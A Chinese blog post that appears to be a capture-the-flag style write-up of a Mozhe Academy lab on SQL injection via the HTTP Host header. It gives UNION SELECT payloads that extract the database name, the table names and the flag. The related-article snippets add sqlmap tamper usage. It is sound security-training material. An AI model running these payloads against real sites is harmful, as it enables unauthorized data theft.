墨者学院mysql注入_【墨者学院】:HTTP头注入实战(host注入)

最新推荐文章于 2022-11-12 22:28:11 发布
最新推荐文章于 2022-11-12 22:28:11 发布
阅读量410 收藏
点赞数
文章标签: 墨者学院mysql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36176546/article/details/113272163
版权

0x00.题目描述:

背景介绍

安全工程师"墨者"最近在练习MySQL头部注入漏洞,自己刚搭建好一个靶场环境PHP+MySQL。尽情的练习SQL注入吧。

实训目标

1、掌握SQL注入原理;

2、了解手工注入的方法

3、了解MySQL的数据结构;

4、了解HTTP头部注入;

解题方向

HTTP头部(HOST注入)

0x01.解题思路:

靶场环境:

7f3f8cba465a

主界面

7f3f8cba465a

墨者网页

手动检测注入点:

7f3f8cba465a

测试行数:

联合注入,首先测出是具体哪几行会出现在返回的网页中,可以看到是第2,3,4行会出现,接下来就是进行爆库。

7f3f8cba465a

一共4行

7f3f8cba465a

手工注入:

利用头部host注入点加联合注入,来进行爆库:

首先是爆数据库名:

payload:union select 1,2,database(),4%23。

response:pentesterlab(当前数据库名)。

7f3f8cba465a

爆数据库名

爆表名:

payload:union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='pentesterlab'),4

7f3f8cba465a

爆数据库表名

爆列名:类似于表名(列名为id,flag)。

爆字段:

payload:union select 1,2,(select group_concat(flag) from flag),4

爆完字段后,再丢到主界面验证得到flag~

0x02.总结:

1.Host字段的作用

通常,我们一台服务器上不止有一个web程序,很多情况下都有几个web程序,也就是说这几个web程序共用一个ip地址。当我们配置基于端口的虚拟主机,这是没有什么问题的,不同的web程序可以通过不同的端口来判断。但是,当我们配置基于域名的虚拟主机时,几个web程序共用一个ip地址(这里我们假设为192.168.1.1)和一个端口(这里我们假设为80端口)。那么,当客户端请求都发到了服务器的80端口,服务器怎么判断这条请求是发送给哪个web程序的呢?这时候,host头出现了,host头指定了应该由哪个网站或是web应用程序来处理一个传入的HTTP请求。web服务器使用该头部的值来将请求分派到指定的网站或web应用程序之上。

2.实际中的意义貌似不大,host投注入一般是用来缓存污染和密码重置,基于host的sql注入方式实在少见。

梅洋汤
关注
墨者学院-SQL注入漏洞测试(HTTP注入)
JimWu的博客
09-04 1301
SQL注入漏洞测试(HTTP注入) 难易程度:★★ 题目类型:SQL注入 使用工具:FireFox浏览器、burpsuite 1.打开靶场,使用burpsuite访问网页,截包。 2.把包send to repeater,根据题目为host注入,把host改为or 1=1,报错,证明存在注入。 3.输入union select 1,2,3,4 查看回显位置。 4.输入union select...
墨者HTTP注入实战host注入
m0_60945802的博客
03-18 7392
墨者HTTP注入实战host注入) 本小白在学习这个靶场的时候,遇到了一些困惑,查找了一些资料,希望能到帮到大家。
墨者靶场mysql注入_靶场练习-墨者学院-sql注入-'X-Forwarded-For' 字段注入
weixin_39926193的博客
02-05 212
X-Forwarded-For知识点:X-Forwarded-For 是一个 HTTP 扩展部。X-Forwarded-For 请求格式:X-Forwarded-For:client,proxy1,proxy2X-Forwarded-For: client, proxy1, proxy2如果一个 HTTP 请求到达服务器之前,经过了三个代理 Proxy1、Proxy2、Proxy3,IP 分别...
墨者学院--手工注入mysql数据库实例
Louisnie
10-16 1131
开启墨者靶场环境,发现此界面,在点击登陆下方的通知之后惊奇的看到存在参数id,可以试试通过传递SQL语句获取数据库信息. 我们可以试试1=1和1=2大法,输入在参数id=1后面加入1=1进行逻辑判断 显示正常,然后换1=2,因为1=2为一个假命题,如果能插入到数据库进行逻辑判断,那么由于该语句错误,数据库查询不到任何信息,界面就不会显示任何信息 根据这种情况可以大概的判断出该网站很大可能存...
墨者 - SQL注入实战-MySQL
吃肉唐僧的博客
07-10 879
按照题目提示,拿MQo=去base64解码,发现是1 tamper是使用SQLMap提供的tamper脚本,可在一定程度上避开应用程序的敏感字符过滤、绕过WAF规则的阻挡,继而进行渗透攻击。这里只要用tamper转base64encode 解码,其他和正常的sqlmap用法没区别 爆库,sqlmap -u http://219.153.49.228:44096/...
墨者 - SQL注入漏洞测试(HTTP注入)
吃肉唐僧的博客
07-07 2539
手动判断注入点 判断字段 判断表名union select 1,2,3,(select group_concat(table_name) from information_schema.tables where table_schema=database...
墨者mysql注入_SQL注入实战-MySQL-墨者学院
weixin_29311017的博客
01-19 231
SQL注入实战-MySQL今天我将用两种方法来讲解,第一种,SQLMap自动化跑数据库,第二种,利用火狐的hackbar来手工注入。【第一种】1.先看这个url:http://219.153.49.228:45709/show.php?id=MQo=,一般来说都是id=一个数字,这个MQo=是属于base64加密,加密规律、规则请参考百度百科。2.用SQLMap的tamper插件,语句:sqlma...
墨者学院之SQL注入实战--MySQL
Chris_HackFromCN的博客
08-10 870
目录手工注入工具注入(中转型)欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 手工注入 辅助工具:小葵多功能转换工具 作用:编码解码、加密解密 1.首先,启动靶场环境,根据URL显示,可知目标
墨者学院MySQL数据库手工注入漏洞(详细篇)
weixin_71487689的博客
11-12 904
背景介绍: 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MySQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 思路: 掌握SQL注入原理; 了解手工注入的方法; 了解MySQL的数据结构; 了解字符串的MD5加解密;
墨者学院-SQL注入漏洞测试(布尔盲注)
weixin_42939822的博客
03-20 4350
决心按部就班、由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路。本题靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目。废话不多说啦,先附上题目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
sql注入(2) 墨者学院之SQL手工注入漏洞测试(MySQL数据库-字符型)
c10udz的博客
04-12 4169
这里我们可以看到版本是10.2.15,前面说过MySQL5.0版本以上有个自带的information_shema数据库,利用这个数据库可以查到整个数据库的结构,不然就只能盲猜了。//注释:(1)information_schema.tables表示information_schena这个数据库下的表,在MySQL中【.】代表下一级。利用'order by 任意数字 %23去判断,得到4(结尾加%23的原因:在一个语句结尾时,需要用#结尾,而#的url编码就是%23)table_schema:数据库名。
墨者学院-HTTP动作练习
JimWu的博客
09-04 370
HTTP动作练习 难易程度:★ 题目类型:网络安全 使用工具:FireFox浏览器、burpsuite 1.打开靶场,打开Burpsuite截包。 2.截到包后,尝试直接修改GET为POST,然后forward。 3.失败 4.返回,再截包,右键change request method。 forward一下。 5.成功获取key! ...
Python urllib HTTP注入漏洞
weixin_30298497的博客
03-08 206
virusdefender · 2016/06/17 17:19from:blog.blindspotsecurity.com/2016/06/adv…0x00 总览Python的urllib库(在Python2中为urllib2,在Python3中为urllib)有一个HTTP协议下的协议流注入漏洞。如果攻击者可以控制Python代码访问任意URL或者让Python代码访问一个恶意的web se...
墨者学院-入门级-HTTP动作练习-小白必看(超详细)
kitiu666的博客
08-18 1505
2020年8月18日,第四次渗透测试试验。 通过拦截数据包响应包,修改内容,实现get变为post的提交。 准备需要: 1.window电脑 2.burpsuite(bp)抓包软件 1.进入靶场 点击【静夜思】后发现页面会发生错误 这时它提示我们说相应URL过长 这样就涉及到GET和POST提交方式的区别 我们猜想有可能是URL的长度过长导致报错 2.开启bp代理 开启响应包拦截(不懂的可以看我第一次试验的投稿) 然后发现,拦截到的数据包有巨多内容,而且提交方式为GET 3.根据提示和之前的两者区
2、1墨者学院实践
qq_44704184的博客
03-12 319
一、来源页伪造 点击访问 点击搜索引擎数据查询平台 可以看到提示信息:当前页面只允许从google.com访问,所以需要改变数据包的来源 利用burp suite抓取到数据包,其中referer属性可以用来跟踪web请求是从什么网站来的,即来源。所以,修改值为google.com (比如我在www.google.com 里有一个www.baidu.com 链接,那么点击这个www.baidu.com ,它的header 信息里就 Referer=http://www.google.com) bu
墨者学院-入门级-SQL手工注入漏洞测试(MySQL数据库)-小白必看(超详细)
kitiu666的博客
04-26 1229
2021年2月2日,第八次渗透测试。 这次实践SQL的盲注,知识点比较多,除了实验的讲述还会加上知识点的讲解; 测试寻找注入口: 1,、进入靶场,发现界面和之前做过的实验一样,我们需要进入“维护通知的地址”进行说起来的注入; 2、我们直接进在地址栏进行SQL语句的注入测试; 在地址栏加上语句“and 1=1”,页面可以正常显示。再尝试加入语句“and 1=2”,页面显示出错,没有了相关内容。说明地址栏是一个sql 的一个注入口;(原理说明可以看我之前做过的实验博客) sql语句注入: 3、发现了注入
03#墨者靶场-SQL手工注入漏洞测试(MySQL数据库)
shy的博客
11-15 743
墨者学习 By/shy014 地址:https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe 1.登陆墨...
墨者SQL手工注入漏洞测试(MySQL数据库)
wswr的博客
03-10 359
掌握流程,判断注入点,找数据库版本和数据库,然后表,然后字段,然后数据 右键查看源码,发现看上去能注入的页面 用 and 1=1 和 and 1=2发现注入点 然后用order by去找这个查询语句查多少个字段一直试到5发现没有页面反弹,说明只有4个 然后再用union查询 注意 id=-1 这样就回弹就显示后面不显示前面的 发现只有23回弹,说明我们一会测试值也要防2,3位置 先看数据库版本和数据库 union select 1,vers...
墨者SQL手工注入漏洞测试(MySQL数据库-字符型)
wswr的博客
03-18 1206
思路:字符型注入,而且看url就是?id=tingjigonggao字符的类型,那肯定就是要闭合单引号然后union 查询 然后老样子,库,表,列,值 那么问题来了,什么是闭合单引号呢,其实简单说就是 字符型查询语句 select A from b where c ='tingjigonggao(字符串)' 所以我们的注入要先把单引号闭合然后在查询,不然union查询都写在单引号里面就没有意义了 即payload是 ' union select d from e --+ 然后我们注入的时候就是
墨者学院sqlmap Host注入
最新发布
07-28
Host注入是一种特定类型的SQL注入攻击方法,攻击者通过修改HTTP请求中的Host字段来执行恶意的SQL查询。 使用SQLMap进行Host注入的步骤如下: 1. 首先,确认目标网站存在Host注入漏洞。可以通过手动尝试...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值